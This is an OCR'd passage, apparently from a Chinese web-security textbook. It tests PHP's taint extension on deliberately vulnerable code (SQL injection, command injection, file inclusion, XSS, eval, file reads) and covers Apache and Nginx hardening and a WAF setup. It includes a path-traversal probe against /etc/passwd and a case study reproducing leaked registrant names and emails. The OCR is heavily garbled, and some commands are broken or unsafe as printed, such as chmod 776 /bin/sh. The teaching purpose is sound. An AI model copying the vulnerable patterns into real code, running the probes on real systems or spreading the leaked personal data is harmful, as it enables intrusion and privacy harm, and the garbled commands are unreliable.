该 警告 信息 表示 SQL 语句 包含 可 能 被 污染 的 数据 ， 表 明 你 的 PHP 代 码 存在 SQL 注入 漏 
洞 。 由 此 可 见 ， 在 taint 未 对 变量 进行 过 滤 或 转 义 时 ， 执 行 SQL 语句 会 给 出 警告 提醒 。 
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2. 测试 命令 执行 


PHP 调 用 系统 命令 的 场景 不 少见 ,现在 来 测试 当 参 数 未 经 过 滤 直 接 放 到 shell_exec 函 数 中 
时 ，taint 是 否 会 给 出 提醒 。 代 码 如 下 ， 变 量 $target 直 接 通过 全 局 变量 $_ REQUEST 获取 ， 未 进 
行 任何 转 义 或 过 滤 ， 将 变量 放 到 shell exec 中 执行 了 。 
<2php 
$target = $ REQUEST['ip]; 
// Determine OS and execute the ping command . 
让 (stristr(php_uname(s), "Windows NT)) { 
$cmd = shell exec(ping '. $target); 
echo '<pre>' . $cmd . '</pre>'; 
}else{ 
$cmd = shell exec(ping -c3'. $target); 
echo '<pre>' . $cmd . '</pre>'; 





} 

运行 页 面 ， 出 现 如 下 警告 信息 : 

Warning: shell_exec(): CMD statement contains data that might be tainted in E:/WWW/tesylow.php on 
line 6 

该 警告 信息 表示 CMD 语 句 包 含 可 能 被 污染 的 数据 , 表明 你 的 代码 中 存在 命令 注入 漏洞 ， 
由 此 可 见 ， 在 taint 未 对 变量 进行 过 滤 或 转 义 时 ， 执 行 系统 命令 会 给 出 警告 提醒 。 

3. 测试 文件 包含 

文件 包含 在 项 目 中 是 必 不 可 少 的 功能 ， 通 常会 使 用 include 和 require， 在 一 些 场景 下 ， 可 
能 会 通过 参数 来 决定 加 载 哪 一 个 文件 ， 如 果 未 对 参数 进行 限定 或 过 滤 ， 则 会 出 现 文件 包含 漏 
洞 ， 下 面 的 代码 将 使 用 include 来 测试 taint 的 文件 包含 提醒 。 可 以 看 出 ， 变 量 $file 直 接 通过 全 
局 变量 $_ GET 获 取 ， 未 进行 任何 限定 或 转移 ， 再 放 入 include 函 数 中 。 

<2php 


$file=$_ GET[file']; 
include($file); 


当 通 过 浏览 器 访问 此 代码 时 ， 警 告 信息 如 下 : 
Warning: include(): File path contains data that might be tainted in E:/WWW /test/low.php on line 3 


该 警告 信息 表示 文件 路 径 包 含 的 数据 可 能 被 污染 , 表明 你 的 代码 存在 文件 包含 漏洞 , 由 
此 可 见 ， 在 taint 未 对 变量 进行 过 滤 或 转 义 时 ， 加 载 参数 中 的 路 径 会 给 出 警告 提醒 。 
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4. 测试 XSS 漏洞 


XSS 跨 站 漏洞 的 主要 原因 是 输入 或 输出 未 做 处 理 , 因此 主要 测试 代码 中 将 直接 获取 参数 
内 容 并 输出 到 页 面 中 。 在 下 方 代码 中 判断 S_GET[mame'] 是 否 存在 值 ， 当 值 存在 时 ， 将 输出 值 
内 容 ， 由 此 验证 当代 码 存在 XSS 跨 站 漏洞 时 ，taint 是 否 会 提示 警告 信息 。 


<?php 
if (larray_key_exists("name", $ GET)||$ GET['name'] == NULL||$ GET[name] =—") { 
Sisempty = true; 
} else { 
echo '<pre>'; 
echo 'Hello '. $_GET['name']; 
echo '</pre>'; 
} 


运行 页 面 ， 警 告 信息 如 下 : 

Warning: main(): Attempt to print a string that might be tainted in E/WW W/test/low.php on line 6 

该 警告 信息 表示 尝试 打印 可 能 被 污染 的 字符 串 ， 表明 你 的 代码 存在 XSS 跨 站 漏洞 。 由 此 
可 见 ， 在 taint 未 对 变量 进行 过 滤 或 转 义 时 ， 输 出 参数 中 的 内 容 会 给 出 警告 提醒 。 

5. 测试 代码 执行 

代码 执行 产生 的 原因 是 开发 者 未 对 参数 进行 过 滤 , 直接 将 参数 作为 代码 执行 ,因此 测试 
的 方法 是 直接 获取 参数 内 容 ， 然 后 使 用 eval 函 数 来 验证 。 代 码 如 下 ， 变 量 $cmd 直 接 通过 全 局 
变量 $_GET 接 收 ， 然 后 使 用 eval 来 执行 。 

<?php 

$cmd=$_GET['cmd']; 

eval("$cmd;"); 

运行 页 面 ， 警 告 信息 如 下 : 

Warning: eval(): Eval code contains data that might be tainted in E/ WW W /test/low.php on line 3 

该 警告 信息 表示 执行 的 代码 可 能 包含 被 污染 数据 , 表明 你 的 代码 存在 代码 执行 漏洞 。 由 
此 可 见 ， 在 taint 未 对 变量 进行 过 滤 时 ， 执 行 参数 中 的 代码 会 给 出 警告 提醒 。 

6. 测试 文件 操作 

文件 任意 内 容 读 取 漏 洞 通常 是 攻击 者 能 够 控制 系统 要 操作 的 路 径 所 导致 的 , 比如 开发 者 
获取 传 过 来 的 参数 ,不 进行 位 置 限定 而 直接 传 入 文件 函数 去 , 就 会 导致 攻击 者 在 权限 满足 的 
情况 下 可 以 操作 任意 文件 。 防 御 的 方法 是 对 参数 进行 限定 后 再 传 入 文件 操作 函数 中 。 下 面 将 
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测试 参数 不 经 过 过 滤 直 接 传递 给 文件 操作 函数 ， 验 证 taint 是 否 会 给 出 警告 提醒 。 代 码 如 下 ， 
变量 $path 直接 从 全 局 变量 $_GET['path'] 中 获取 后 交 由 file 函 数 操作 ， 可 以 看 出 此 代码 存在 被 
攻击 者 利用 的 风险 。 

?php 

print "<h2>Number 3: file() functions: <h2>"; 

$path= $_GET['path']; 

S$contents = file($path); 

foreach ($contents as $line num => $line) { 

echo "Line #<b> {$line num}</b> : " . htmlspecialchars($line) . "<br>\n"; 

当 通 过 浏览 器 访问 到 此 代码 时 ， 在 页 面 中 可 以 看 到 如 下 警告 信息 : 

Warning: file(): First argument contains data that might be tainted in E:/WWW/test/low.php on line 4 


该 警告 信息 表示 file 函 数 的 第 一 个 参数 可 能 包含 被 污染 的 数据 ， 表 明 你 的 代码 存在 文件 
操作 漏洞 。 由 此 可 见 ， 在 taint 未 对 变量 进行 过 滤 时 ， 操 作 前 端 提交 过 来 的 文件 路 径 会 给 出 警 
告 提醒 。 


4.2.4 小 结 





通过 上 面 的 代码 验证 可 以 看 出 ， 当 参数 未 经 过 滤 ，taint 在 SQL 注入 、 命 令 执行 、 文 件 包 
含 、XSS 跨 站 、 代 码 执行 、 文 件 操作 等 方面 都 会 给 出 提醒 。 

同时 对 于 以 上 几 种 漏洞 ， 最 佳 的 防御 方案 是 在 输入 位 置 进 行 控制 ， 比 如 当 要 裸 写 SQL 
语句 时 ， 需 要 考虑 参数 是 否 已 经 转移 ， 而 文件 操作 则 需要 考虑 文件 路 径 是 否 处 于 限定 位 置 。 


Apache 是 一 个 很 常见 的 Web 服 务 器 ， 特 别 是 在 Windows 系 统 中 更 加 常见 ， 通 常安 装 完 
Apache 后 会 增加 一 下 虚拟 主机 ， 其 他 一 切 基本 就 使 用 默认 配置 ， 不 过 默认 配置 隐藏 着 很 多 安 
全 风险 ， 本 节 将 学 习 如 何 让 Apache 更 加 安全 。 
4.3.1 屏蔽 版 本 信息 

在 Apache 的 默认 配置 中 ， 访 问 一 些 页 面 时 ， 系 统 会 把 Apache 版 本 模块 都 显示 出 来 ， 而 
一 些 攻 击 者 会 通过 Apache 暴 露出 来 的 信息 发 起 针对 性 的 攻击 , 所 以 为 了 服务 器 的 安全 , 一 定 
要 及 时 关闭 这 些 信息 。 下 面 介绍 操作 方式 。 
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1. 打开 Apache 的 配置 文件 httpd.conf 


(1) 找到 ServerTokens OS， 修 改 为 ServerTokens ProductOnly。 
(2) 找到 ServerSignature On， 修 改 为 ServerSignature Off。 


2. 重新 启动 Apache 
设置 好 上 述 选项 后 ， 重 新 启动 Apache 服务 器 。 
4.3.2 ”目录 权限 隔离 
Apache 安 装 后 会 产生 serverRoot、DocumentRoot、ScripAlias、Customlog、Errorlog 目 录 ， 
这 些 目录 分 别 有 对 应 的 功能 ， 所 以 需要 对 它们 设置 单独 的 权限 ， 有 具体 权限 配置 如 下 : 
(1) ServerRoot 目 录 只 有 具有 管理 权限 的 用 户 才能 访问 。 


(2) DocumentRoot 能 够 被 管理 Web 站 点 内 容 的 用 户 、 使 用 Apache 服 务 器 的 Apache 用 户 
和 Apache 用 户 组 访问 。 


(3) 只 有 Admin 组 的 用 户 可 以 访问 日 志 目录 。 
4.3.3 ”关闭 默认 主机 


在 安装 好 Apache 后 ， 一 般 会 有 一 个 默认 的 主机 目录 ， 这 个 目录 可 以 不 通过 域名 访问 卫 
直接 访问 到 ， 主 机 中 可 能 会 存在 一 些 服务 器 敏感 信息 ， 特 别 是 使 用 一 键 安装 LNMP 环 境 的 软 
件 ， 比 如 lnmp.org 提供 的 集成 环境 ， 在 网 站 代码 存放 的 默认 主机 目录 下 会 有 phpinfo、 探 针 
以 及 连接 数据 库 的 功能 ， 因 此 环境 搭建 好 了 后 记得 关闭 默认 主机 ， 只 开放 自 定义 的 主机 ， 以 
避免 留 下 安全 隐患 。 


4.3.4” 低 权限 运行 


通常 会 使 用 root 安 装 Apache， 默 认 情况 下 ，Apache 也 是 由 root 来 运行 的 ， 高 权限 下 同样 
存在 高 风险 ， 如 果 存 在 一 个 Web 服 务 的 漏洞 ， 可 能 会 带 来 致命 的 风险 ， 所 以 需要 让 Apache 
尽 可 能 在 低 权限 下 运行 ， 具 体操 作 方 法 如 下 : 

打开 httpd.conf， 在 文件 中 加 入 : 

User nobody; 

Group# -1; 
4.3.5 ”防止 用 户 自 定义 设置 


.htaccess 文 件 可 以 修改 一 些 配 置 项 ， 相 信 大 家 并 不 陌生 。 而 对 于 安全 方面 来 说 ， 让 用 户 
能 修改 设置 项 是 否 会 带 来 一 些 安全 问题 呢 ? 在 不 是 非常 必要 的 情况 下 , 可 以 在 Apache 服 务 器 
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的 配置 文件 中 进行 以 下 设置 ， 阻 止 用 户 建立 、 修 改 .htaccess 文 件 ， 防 止 用 户 超越 能 定义 的 系 
统 安全 特性 。 
<VirtualHost *:80> 
ServerName dvwa.localhost 
DocumentRoot E:/www/dvwa 
<Directory "E:/www/dvwa/"> 
AllowOveride None 
Options None 
Allow from all 
</Directory> 
</VirtualHost> 


4.3.6 禁止 显示 目录 


在 Apache 默 认 的 情况 下 ， 如 果 你 在 浏览 器 中 输入 地 址 :http://localhost/， 文 件 根 目录 里 
有 index.html， 浏 览 器 就 会 显示 index.html 的 内 容 ， 如 果 没有 index.html， 浏 览 器 就 会 显示 文 
件 根 目 录 的 目录 列表 ， 目 录 列 表 包 括 文件 根 目录 下 的 文件 和 子 目 录 。 
同样 , 输入 一 个 虚拟 目录 的 地 址 : http://localhost/b/, 如 果 该 虚拟 目录 下 没有 index.html， 
浏览 器 也 会 显示 该 虚拟 目录 的 目录 结构 ， 列 出 该 虚拟 目录 下 的 文件 和 子 目 录 。 而 这 些 信息 在 
某 些 情况 下 很 有 可 能 会 造成 数据 泄露 或 者 被 其 他 方式 攻击 。 
在 生产 环节 中 , 绝 大 部 分 情况 下 并 不 需要 对 用 户 显示 目录 下 的 文件 , 所 以 我 们 需要 把 该 
功能 关闭 。 
先 来 看 一 个 目录 的 配置 : 
<Directory "D:/Apa/blabla"> 
Options Indexes FollowSymLinks 
AllowOverride None 
Order allow,deny 
Allow from all 
</Directory> 
在 配置 信息 中 有 一 个 Indexes， 作 用 是 当 该 目录 下 没有 index.html 文 件 时 ， 就 显示 目录 结 
构 ， 去 掉 Indexes，Apache 就 不 会 显示 该 目录 的 列表 了 。 
所 以 你 只 需要 将 上 面 代码 中 的 Indexes 去 掉 ， 就 可 以 禁止 Apache 显 示 该 目录 结构 ， 用 户 
就 不 会 看 到 该 目录 下 的 文件 和 子 目录 列表 了 。 
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2011 年 07 月 ， 白 帽子 pestu 提交 “Apache 未 禁止 目录 浏览 导致 .cn 域名 的 用 户 信息 


泄露”。 
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从 该 漏洞 案例 的 描述 可 以 看 出 是 新 网 互联 的 Apache 配置 不 当 所 引起 的 数据 泄露 问题 。 


白 帽子 发 现 此 URL (http://117.70.***.50/cn/) 未 禁止 目录 浏览 


并 拼凑 出 可 以 下 载 的 URL。 
http://117.70.***.50/cn/domain_ info.txt 


http://117.70.***.50/cn/domain_reason.txt 


http://117.70.***.50Q/cn/errorO.csv 
http://117.70.***.50Q/cn/errorl.csv 
http://117.70.***.50/cn/error2.csv 


导致 大 量 .cn 域名 的 用 户 信息 泄露 ， 


分 数据 可 以 看 出 ， 小 主机 名 新 网 王 基 用 玉 宙 从 : 加 扣 扣 的 用 户 实 各 性 因 的 服 才 可、 
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"2 /Ul 全 洗 回 因 -| 邑 和 %， 钥 训 | 重 王 | 田 "多 "A*AN 
> 人 有 周 访问 量 
= B C D E 6 H I nl Kk J 
域名 ”到 期 日 期 ID 拒绝 原因 一 拒绝 原因 - 提 

922 xinw acca. ac. ¢ 20110616 000657011 吴 高 被 中 欧 国际 3stammye16 86. 10867 3.3 霖 提 文 大 陆 居民 身份 证 
3766 xinw inbcams, < 20120601 0006661nC 社 豆 佑 ”中 国医 学 jdai qing@i 86. 87183 1.3 身份 证 明 上 的 姓名 与 系 
385 xinm 3399. ac.c 20120703 000666312 李 处 坚 北京 国民 ?ck1331888 1.3 身份 证 明 上 的 姓名 与 系 

8 xinm toto, ac, ¢ 20120302 ctzplswsc 高 玉英 东 陶 机 器 (gaoyingyu 5.2 身份 证 验证 失败 90,1 组 织 
554 xinm .cum-unive 20111213 ctan91ctr 吴 凯 ”美国 加 州 和 cumaniver 90. 1 组 织 机 构 代码 证 或 在 

56 xinw mybaby. ac 20101107 ctldmhldc 丽 萨 。 ”北京 华 博 1joy82008- 1.3 身份 证 明 上 的 姓名 与 系 3. 2 提交 

35 xinw emporium, 20101114 ctugeu3zr 丽 工 信 当 商务 a88q858-q8 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3. 1 木 提 3 

287 xinw lbuying. ac 20101114 ctx2ftflF 了 两 羡 信誉 商务 =88a88-ag 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.1 未 提 3 

3l xinw yj.ac.cn 20101009 ctt64j3xcwang fuju 王 甫 姓 solar@126 86. 10641 1.3 身份 证 明 上 的 姓名 与 系 1.5 个 从 
281 xinw 12114.ac. 20111016 ctgqbwqjy 高 临 频 。 范 神 神 gaoly838j 85. 20283 31.2 提 文 材料 非 代码 证 或 21.5 个 人 
122 xinw pai.ac. cr 20101018 ct3u30ueCwang fuju 王 甫 君 solar@126 86. 10641 1.3 身份 证 明 上 的 姓名 与 系 1.5 个 人 

9 xinm baidus. ac 20101203 te 信誉 商务 _a88q88-q8 86. 20805 1.3 二 的 外 所 与 系 3.1 未 提 3 
了 96 xinw stylish. z 20110821 ctub2t3 阳光 网 络 fcqccc1001 86. 23626 90. 1 组 织 机 构 代码 证 或 企 190.2 身份 
115 xinw btob. ac.c 20101108 ct0]als， 由 信誉 商务 a88q88-qs 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.1 未 提 3 
101 xinm ib2bb. ac. ¢ 20101108 cteqykq5e 丽 萨 信誉 商务 _a88q88-q8 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.1 未 提 3 
260 xinw bride. ac. 20101015 ctxldkh7c 丽 萨 北京 华 博 1joy82008- 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.2 提交 
106 xinw jgooogle.a 20101203 ctenl8zfd 丽 萨 信誉 商务 s88q83-qg 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.1 未 提 3 

56 xinw zjl. ac. cr 20101111 ct729scyc 丽 萨 。 北京 华 博 1a88q88-q& 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.2 提交 
2836 xinw fdl. ac. < 20121023 ctz3e6sec 刘 元 风 ”北京 服装 41iblpf8bi 86. 10643 1.3 身份 证 明 上 的 姓名 与 系 
254 ximw phonetics 20111209 ctarrv83m 孔 江平 ”北京 大 学 Fkong jp@en 86. 10628 3.3 未 提交 大 陆 居民 身份 证 

8 xinw sapa.ac.<20111008 ct0tia9nt 雨 下 _ 博 视 坊 国 Ryx@bsfcn. 86. 10516 1.2 营业 执照 上 的 机 构 名 称 1. 3 身份 i 
3568 xinm gdgc.ac.c 20120828 ctu3gdvtc 张 两 东 ”中 国 科学 Binfocente 86. 28851 1.3 身份 证 明 上 的 姓名 与 系 

T5 xinm googl.ac. 20101203 ctcryjjrz 丽 萨 “信誉 商 务 a88q88-qg 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.1 未 提 3 

60 xinw con. ac. cr 20101206 ctxt14xij 林 丰 林 丰 75584728@c 86. 10852 1.3 身份 证 明 上 的 姓名 与 系 

55 xinw zqd. ac. cr 20101029 ct717mihtlisa 北京 华 博 lasent1602 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3. 2 提交 

13 xinw taylorswi 20110916 cttaxgv8i 肖 菊 平 wangchani 86. 10807 90. 4 资料 不 清晰 或 涂改 

69 xinm chnmobile 20101117 ct6d9tyis 了 丽 玄 商务 as88q88-q8 86. 20805 1.3 身份 证 明 上 的 姓名 与 系 3.1 未 提 z 

57 xinw baiduu ac 20101203 ctgrwpala 丽 庄 信和 党 商务 a88q88-q8 86. 20805 1.3 身份 证 明 上 的 姓名 与 条 3.1 未 提 3 
ie 0lnnaan nnnkaaeclRk 就 广 在 尖刀 和 haoaalae 20E14 10E/ an 1 姐 纪 如 罗 代 Ea 江 或 人 ol 2 担 访 | 

图 4-2 泄露 的 用 户 信息 


从 目录 中 发 现 以 下 文件 名 ， 


受 影响 的 域名 大 约 有 21 000 个 左右 。 从 图 4-2 的 部 





从 这 个 漏洞 案例 中 可 以 看 出 ， 去 掉 Apache 配置 文件 httpd.conf Inddexes 选项 的 重要 性 。 
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在 Web 服 务 中 ， 目 前 Nginx 作 为 绝对 主流 的 Web 服 务 器 ， 其 安全 配置 十 分 重要 ， 安 全 配 
置 主要 是 指 攻击 者 没有 入 侵 进 来 的 配置 方法 和 攻击 者 已 经 发 现 了 网 站 的 安全 漏洞 , 需要 通过 
后 备 手段 来 减少 攻击 者 对 服务 器 造成 的 危害 。 本 节 将 对 Nginx 的 安全 配置 进行 讲解 。 

4.4.1 配置 防御 


Nginx 的 配置 防御 包括 权限 配置 与 访问 限制 , 权限 配置 的 主要 目的 是 防止 攻击 者 发 现 某 些 漏 
洞 后 可 以 轻易 地 攻击 获取 WebShell， 而 访问 限制 的 主要 目的 则 是 让 攻击 者 不 能 访问 某 些 URL。 


1. 权限 配置 


权限 配置 包括 文件 权限 和 运行 账户 权限 两 部 分 , 文件 权限 代表 代码 文件 本 身 的 权限 ， 比 
如 文件 的 所 有 者 用 户 有 哪些 权限 、 其 他 用 户 有 哪些 权限 ; 运行 账户 权限 则 是 指 运行 代码 使 用 
哪 一 个 账户 去 运行 它 。 本 小 节 中 将 介绍 如 何 正确 地 配置 文件 权限 以 及 服务 运行 账户 权限 。 


(1) 文件 权限 
为 了 防止 攻击 者 在 Web 目 录 中 生成 木马 文件 , 开发 者 不 应 该 既 给 Web 运 行 目录 写 入 权限 
又 给 执行 权限 ， 而 是 只 给 执行 权限 即 可 。 可 以 通过 chmod 命 令 把 目录 设置 成 可 执行 脚本 ， 但 
不 可 以 写 入 , 不 能 对 一 个 目录 既 有 执行 权限 又 有 写 入 权限 ， 这 样 可 以 一 定 程度 上 防止 一 些 文 
件 上 传 攻击 。 
(2 ) 运行 账户 权限 
建议 使 用 nobody 账 户 来 运行 Nginx， 并 且 确 认 网 站 目录 对 于 nobody 的 权限 为 可 读 、 可 执 
行 , 对 于 上 传 目录 或 者 写 入 文件 的 目录 添加 nobody 的 读 取 和 写 入 权限 , 但 不 要 给 予 执行 权限 。 
2. 访问 限制 
访问 限制 包括 路 径 限制 和 日 志文 件 限制 ,路 径 限 制 主要 用 于 少 部 分 用 户 可 以 访问 特定 的 
URL, 通常 会 通过 IP 来 实现 ; 日 志文 件 限制 则 是 防止 攻击 者 通过 日 志文 件 分 析出 服务 器 的 一 
些 弱 点 。 下 面 将 介绍 限制 配置 的 方法 。 
(1) 路 径 限 制 
一 些 内 部 办 公 系 统 可 能 并 不 需要 让 所 有 IP 能 被 访问 到 ， 此 时 需要 针对 URL 来 限制 IP 访 
间 ， 可 使 用 如 图 4-3 所 示 的 配置 文件 来 实现 这 种 限制 。 
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RIPT_FILENAME /data/www$fast 





图 4-3 限制 权限 的 配置 文件 


(2) 日 志文 件 限制 

很 多 小 网 站 会 把 产生 的 日 志 直 接 放 在 Web 目 录 中 , 日 志 中 通常 包含 SQL 语句 错误 调试 等 
方面 的 信息 ， 不 仅 暴露 了 表 结构 ， 还 暴露 了 网 站 所 处 的 位 置 ， 给 攻击 者 带 来 更 多 可 利用 的 信 
息 。 因 此 ， 笔 者 建议 把 日 志 存放 于 Web 目 录 以 外 ， 在 某 些 不 方便 的 情况 下 ， 也 可 以 考虑 使 用 
Nginx 屏 蔽 该 目录 ， 操 作 方 法 如 图 4-4 所 示 。 

location ~* \.txt$ { 
if (-f $request filename) { 
root /home/domain/public_html/test; 


break; 


} 


} 





图 4-4 Nginx 屏蔽 TXT 文件 访问 配置 代码 

(3 ) 限制 网 站 TXT 文件 被 访问 

从 图 4-4 中 可 以 看 到 ， 当 用 户 访问 后 缀 为 TXT 的 文件 时 ，Nginx 将 会 重新 定义 root 的 位 置 ， 
而 新 的 网 站 目录 是 没有 对 应 文件 的 ， 因 此 用 户 不 能 获取 到 TXT 日 志文 件 。 
4.4.2 ”防止 权限 扩大 

在 Nginx 安 全 配置 中 ， 既 需要 防止 攻击 者 突破 防御 线 ， 又 要 考虑 攻击 者 突破 防御 后 如 何 
减少 对 系统 的 伤害 ， 下 面 将 从 目录 执行 权限 配置 与 限制 账户 目录 权限 进行 介绍 ， 给 出 常见 的 
配置 方法 ， 并 解释 此 方法 背后 的 意义 。 

1. 目录 执行 权限 

在 Web 安 全 漏洞 中 ， 上 传 漏洞 的 占 比 非常 大 ， 其 中 的 问题 在 于 上 传 的 文件 可 以 作为 脚本 
来 执行 ， 所 以 需要 针对 上 传 目 录 在 Nginx 配 置 文件 中 加 入 配置 来 加 以 限制 ， 让 此 目录 无 法 解 
析 PHP， 具 体操 作 方 法 如 下 : 





(1) 编辑 Nginx 配 置 文件 ，vim /usr/local/nginx/conf/nginx.conf。 
(2) 在 文件 中 加 入 图 4-5 中 的 代码 。 
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图 4-5 加 入 的 代码 





在 上 面 的 配置 中 , 即使 攻击 者 已 经 成 功 地 上 传 了 一 个 PHP 木 马 到 uploads 目 录 中 , 但 Nginx 
匹配 到 了 攻击 者 正在 访问 uploads 目 录 下 的 PHP 文 件 ， 会 拒绝 往 下 执行 。 因 此 ， 攻 击 者 依然 无 
法 对 系统 造成 有 价值 的 伤害 。 

2. 限制 账户 目录 权限 

假设 攻击 者 已 经 通过 文件 上 传 或 者 某 种 方式 同时 拥有 php-fpm 运 行 账户 的 所 有 权限 ， 此 
时 开发 者 要 做 的 就 是 防止 权限 扩大 化 ， 可 提前 限制 php-fpm 运 行 账户 的 权限 ， 使 木马 不 能 读 
写 Web 目 录 以 外 的 文件 。 有 具体 操作 步骤 如 下 : 

(1) chmod or -R / 让 该 账户 失去 所 有 权限 
(2) chmod otr -R html/ 单独 赋予 Web 目 录 权 限 
(3) 限制 账户 命令 执行 权限 

大 部 分 攻击 者 在 登录 到 服务 器 后 ， 都 会 通过 执行 shell 来 获取 更 多 的 权限 ,因此 如 果 确 认 
不 需要 使 用 shell 命 令 ， 可 以 通过 配置 文件 取消 php-fpm 账 户 对 于 shell 的 执行 权限 。 操 作 方 法 
如 下 : 

执行 命令 chmod 776 /bin/sh 


4.4.3 WAF 扩展 





上 文中 提 到 的 入 侵 前 防御 和 防止 权限 扩大 化 都 是 针对 项 目 所 定制 的 一 些 配 置 , 在 实际 工 
作 中 ， 其 实 有 很 多 项 目的 漏洞 防御 方案 ， 比 如 前 面 提 到 的 SQL 注 入 、XSS 跨 站 ， 这 些 常 规 漏 
洞 其 实 已 经 有 开发 者 做 成 了 防御 模块 。 

我 们 可 以 通过 安装 这 些 模块 来 提升 安全 性 , 在 Nginx 中 目前 有 3 个 比较 常见 的 漏洞 防御 模 
块 ， 即 modsecurity、Naxsi 和 ngx_lua_waf， 这 里 将 用 ngx_lua_waf 进 行 讲解 ， 下 面 介绍 配置 
方法 。 

1. 安装 


ngx_lua_waf 是 通过 Lua 语 言 开发 的 ， 所 以 要 使 用 ngx_lua_waf 需 要 先 安 装 Lua 环 境 ， 安 装 
命令 如 下 : 
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wget http://luajit.org/download/LuaJlT-2.0.3.tar.gz 

tar xf LuaJlT-2.0.3.tar.gz 

cd LuaJIT-2.0.3 

make && make install 

ln -sv /usr/local/lib/libluajit-5.1.s0.2.0.3 /lib64/libluajit-5.1.s0.2 


下 载 ngx_devel_kit 并 解压 : 


wget https://github.com/simpl/ngx_devel kit/archive/v0.2.17.tar.gz 
tar xf v0.2.17.tar.gz 


下 载 ngx_lua 并 解压 : 
‘wget https://github.com/chaoslawful/lua-nginx-module/archive/v0.9.6.tar.gz 


tar xf v0.9.6.tar.gz 

重新 编译 安装 Nginx: 

/configure --user=-www --group=www  --prefix=/usr/local/nginx --with-http_stub_status_ module 
--without-http-cache --with-http_ssl module --with-pcre=/home/soft/pcre-8.31 


--add-module=/home/lua-nginx-module-0.9.6 --add-module=/home/ngx_devel kit-0.2.19 
make # 编 译 nginx 
cp /usr/local/nginx/sbin/nginx /usr/local/nginx/sbin/nginx.bak # 备 份 之 前 的 Nginx 
cp ./objs/nginx /usr/local/nginx/sbin/ 。 # 把 新 编译 的 Nginx 复制 到 之 前 的 位 置 
下 载 ngx_lua_waf 并 解压 : 


wget https://github.com/loveshell/ngx_lua_waf/archive/master.zip 
unzip master.zip 
mv master /usr/local/nginx/ngx_lua_ waf/ 


2. 配置 防火 墙 规则 
修改 Nginx 的 配置 文件 ， 根 据 实际 情况 更 改 路 径 : 


lua_need_request_body on; 

lua_package path \"/usr/local/nginx/conf/ngx_lua_waf/?.lua\"; 
lua_shared_dict limit 10m:; 

init by_lua file /usr/local/nginx/conf/ngx_ lua_ waf/init.lua; 
access_by_lua file /usr/local/nginx/conf/ngx_lua_waf/waf.lua; 


配置 config.lua 中 的 waf 规 则 : 

RulePath = "/usr/local/nginx/conf/waf/wafconf/" 
绝对 路 径 如 果 有 变动 ， 就 需要 对 应 修改 ， 然 后 重启 Nginx 即 可 。 
配置 文件 详细 说 明 如 下 : 


TN 
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RulePath = "/usr/local/nginx/conf/waf/wafconf/” ”# 规 则 存放 目录 
attacklog = "off' # 是 否 开启 攻击 信息 记录 ， 需 要 配置 logdir 
logdir = "/usr/local/nginx/logs/hack/” ”#log 存储 目录 ， 该 目录 需要 用 户 自己 新 建 ， 且 需要 Nginx 


用 户 的 可 写 权 限 
UrlDeny="on" # 是 否 拦截 URL 访问 
Redirect="on" #-- 是 否 拦 截 后 重 定向 
CookieMatch = "on" # 是 否 拦截 Cookie 攻击 
postMatch = "on" # 是 否 拦截 post 攻击 
whiteModule = "on" # 是 否 开启 URL 白 名 单 
black_fileExt={"php","jsp"} # 填 写 不 允许 上 传 文件 后 缀 类 型 
ipWhitelist={"127.0.0.1"} #IP 白 名 单 ， 多 个 IP 用 逗号 分 隔 
ipBlocklist={"1.0.0.1"} #IP 黑 名 单 ， 多 个 IP 用 逗号 分 隔 


CCDeny="on" # 是 否 开启 拦截 cc 攻击 (需要 nginx.conf 的 http 段 增加 lua_shared_dict limit 10my) 
CCrate = "100/60" ”# 设 置 cc 攻击 频率 ， 默 认 1 分 钟 同一 个 IP 只 能 请 求 同 一 个 地 址 100 次 
html=[[Please go away~~]] 。”# 警 告 内 容 ， 可 在 中 括号 内 自 定 义 : 不 要 乱 动 双 引号 ， 区 分 大 小 写 


3. 验证 

部 署 完毕 可 以 尝试 如 下 命令 : 

curl http://localhost/index.php?id=../../../etc/passwd 

返回 “Please go away~~” 字 样 ， 说 明 规 则 生效 ， 这 个 时 候 可 以 去 日 志 中 查看 被 拦截 的 


记录 。 
4.4.4 _ Nginx 解析 漏洞 


在 Nginx+PHP 服 务 器 中 ， 如 果 PHP 的 配置 中 cgi.fix_pathinfo=1， 就 会 产生 一 个 文件 解析 


漏洞 。 而 恰恰 在 Nginx 配 置 文件 中 ，cgifix_pathinfo 的 默认 值 就 是 1， 如 果 开发 者 把 其 值 设 置 
为 0， 就 会 导致 很 多 需要 用 到 的 pathinfo 框 架 〈 如 ThinkPHP ) 都 无 法 运行 。 


这 个 漏洞 就 是 ， 比 如 http://www.localhost.testimg/1jpg 是 正常 访问 一 张 图 片 ， 


而 http:/www.localhost.test/img/1.jpg/1.php 却 会 把 这 张 图 片 作为 PHP 文 件 来 执行 。 下 面 介绍 
Nginx 解 析 漏 洞 的 利用 条 件 以 及 防御 建议 。 
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1. 漏洞 条 件 

攻击 者 想 要 利用 Nginx 的 解析 漏洞 ， 必 须要 满足 以 下 4 个 条 件 : 
运行 环境 必须 是 Nginx 服务 器 +PHP 脚本 。 

配置 文件 中 的 cgi.fix_pathinfo 值 必 须 为 1 。 

文件 上 传 目 录 拥 有 脚本 执行 权限 。 

攻击 者 可 以 访问 上 传 的 原文 件 。 





他 
ba 
ba 
bd 
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接 下 来 分 析 一 下 攻击 者 是 如 何 获取 运行 环境 信息 的 , 运行 环境 通常 情况 下 并 不 能 直接 在 
网 页 中 得 到 ， 但 可 以 通过 一 些 特征 间接 获取 ， 比 如 攻击 者 可 以 通过 浏览 器 的 调试 工具 从 
Network 选 项 中 发 现 HTTP 的 响应 头 信息 ， 如 果 在 响应 头 信息 中 看 到 是 Nginx+PHP， 就 代表 满 
足 第 一 个 条 件 ， 所 以 在 不 是 非常 必要 的 情况 下 ， 应 尽量 关闭 网 站 运行 环境 的 信息 输出 。 

现在 来 看 获取 cgi.fix_pathinfo 值 的 方法 ， 在 正常 情况 下 是 不 能 直接 获取 的 ， 除 非 是 攻击 
者 能 看 到 目标 的 phpinfo 信 息 。 但 是 攻击 者 可 以 从 侧面 来 推断 ， 比 如 知道 网 站 使 用 的 是 哪 种 框 
